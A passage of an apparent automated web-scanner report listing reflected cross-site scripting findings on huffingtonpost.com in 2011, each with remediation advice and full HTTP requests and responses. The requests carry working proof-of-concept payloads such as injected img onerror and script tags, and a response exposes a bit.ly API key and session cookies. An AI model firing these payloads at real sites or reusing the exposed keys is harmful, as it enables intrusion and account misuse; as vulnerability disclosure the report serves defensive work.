   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73665"-alert(1)-"b74fba3530f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/?73665"-alert(1)-"b74fba3530f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140702
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=287
Date: Thu, 05 May 2011 10:58:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/?73665"-alert(1)-"b74fba3530f=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225fd"-alert(1)-"d892f95823f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256534
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'media';
   HPConfig.current_vertical_id = 4;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0d5c"-alert(1)-"6cd81aa9f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

The sink is the inline HPConfig.current_uri assignment, which embeds the raw request URI (path and query string) in the page's configuration script. Because the whole URI is reflected, the parameter name does not have to be one the application reads, and the same sink is reachable from any page that carries this script block (2.26 and 2.31 show the same pattern on other paths).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the first quotation mark in the payload closes the string literal, and alert(1) is then evaluated as an operand of the resulting subtraction expression.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is not possible, the value should be written as a JavaScript string literal by a JSON encoder that also escapes the < character (so that a </script> sequence inside the value cannot close the script element at the HTML level), never by concatenating it between quotation marks.

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The payload e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742 was submitted inside the value of the spot parameter, between right_rail_/ and flex (the scanner files this finding under the name of an arbitrarily supplied parameter, but the request below shows it is the same spot sink as 2.25). This input was echoed as e44cb<img src=a onerror=alert(1)>247063d742 in the application's response, with no encoding applied.

The response body is a JSON object, but it is served with Content-Type: text/html and no X-Content-Type-Options header, so a browser that is sent to this URL directly parses the body as an HTML document and fires the onerror handler of the injected <img> element. The request's X-Requested-With: XMLHttpRequest header shows that the endpoint is normally called from script on the page, where the reflected markup is not rendered; exploitation therefore relies on a victim following a crafted link to the endpoint itself.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_/e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742flex HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:42 GMT
Connection: close
Content-Length: 86

{"result":false,"spot":"right_rail_\/e44cb<img src=a onerror=alert(1)>247063d742flex"}

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /ads/check_flights.php

Issue detail

The value of the spot request parameter is copied unencoded into the response body. The payload 4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 was submitted in the spot parameter. This input was echoed as 4f9ed<img src=a onerror=alert(1)>7efda56f1f4 in the application's response.

As in 2.24, the body is JSON served as text/html, so when the URL is opened directly in a browser the injected <img> element is rendered and its onerror event handler runs alert(1). Serving the endpoint as application/json with X-Content-Type-Options: nosniff, and escaping < in the JSON output, removes the sink.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_flex4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:40 GMT
Connection: close
Content-Length: 85

{"result":false,"spot":"right_rail_flex4f9ed<img src=a onerror=alert(1)>7efda56f1f4"}

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /advertise/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3503"-alert(1)-"679e429de31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/?c3503"-alert(1)-"679e429de31=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96474
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/19
...[SNIP]...
ble_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;    
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/advertise/?c3503"-alert(1)-"679e429de31=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is used as the JSONP callback name: it is written unencoded at the very start of the response, immediately before the JSON argument. The payload 27f4c<script>alert(1)</script>ea4f1e5950b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

Because the response is served as text/html rather than as JavaScript, a browser that opens the URL directly renders it as an HTML document and executes the injected <script> element. The callback position is also a code context, not a string context: whatever is supplied is emitted as JavaScript, so the fix is to validate the callback name against a strict dotted-identifier pattern and reject anything else, not to encode it.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:43 GMT
Connection: close
Content-Length: 5901

window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"
...[SNIP]...

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied unencoded into the global_name field of the JSON argument passed to the JSONP callback. The payload 7d045<img%20src%3da%20onerror%3dalert(1)>df834abc014 was submitted in the gn parameter. This input was echoed as 7d045<img src=a onerror=alert(1)>df834abc014 in the application's response.

The JSON string syntax is intact (the value is still inside its quotation marks), so the injection only succeeds because the response is served as text/html: opened directly, the browser renders the body as HTML and fires the onerror handler. Escaping < in JSON output and serving the endpoint as application/javascript with X-Content-Type-Options: nosniff removes the sink.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_17d045<img%20src%3da%20onerror%3dalert(1)>df834abc014&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:42 GMT
Connection: close
Content-Length: 5904

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_17d045<img src=a onerror=alert(1)>df834abc014","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against Releasing Bin Laden Photos","views_amount"
...[SNIP]...

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is split on commas and each item is echoed unencoded in the slice_names array of the JSON argument. The payload 963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3 was submitted in the sn parameter. This input was echoed as 963b6<img src=a onerror=alert(1)>f99a809b4c3 in the application's response.

This is the same sink and the same text/html content-type problem as 2.28; the PoC uses an event handler on an injected <img> element, which fires when the response is rendered as an HTML document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:41 GMT
Connection: close
Content-Length: 5924

